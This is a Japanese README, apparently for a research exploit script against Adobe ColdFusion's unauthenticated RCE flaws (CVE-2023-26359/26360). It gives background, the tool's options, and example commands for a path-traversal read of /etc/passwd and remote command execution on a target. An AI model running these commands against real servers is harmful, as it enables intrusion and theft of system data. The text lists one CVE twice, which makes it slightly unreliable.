
2023年3月8日、Adobe は、人気の Web アプリケーション開発プラットフォームである Adobe ColdFusion の重大な脆弱性に対処するため、セキュリティアップデートをリリースしました。不適切なアクセス制御および安全でないデシリアライゼーションに分類されるこれらの脆弱性は、攻撃者が信頼できないデータを含む特別に細工されたリクエストを ColdFusion サーバーに送信すると、未認証のリモートコード実行(RCE) につながります。
この悪用にはユーザーの操作は必要ありません。攻撃者はユーザーが知らぬ間に、現在のユーザーのコンテキストで任意のコードを実行できるため、特に深刻です。
サイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)は、2023年12月5日、これらの問題が活発に悪用されていることに関する勧告を発表し、この問題の重大性を強調しました。この脆弱性は、サイバー脅威アクターによって、一般公開されている Adobe ColdFusion Web サーバーへの初期アクセスを得るために利用されていると指摘されています。最も深刻な脆弱性のCVSS スコアは 9.8 で、Critical(重大) に分類されています。
つまり、さらなる調査の結果、3つの異なる問題が特定されました。
このエクスプロイトスクリプトは、vsociety での CVE 分析のために作成されました。
ヘルプ:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
このエクスプロイトスクリプトは、研究および効果的な防御技術の開発のみを目的として作成されています。悪意のある活動や不正な活動に使用することは意図されていません。作者およびスクリプトの所有者は、このソフトウェアによって引き起こされた誤用または損害について一切の責任を負いません。ユーザーは、このソフトウェアを責任を持って、適用される法令に従ってのみ使用することが強く求められます。責任を持って使用してください。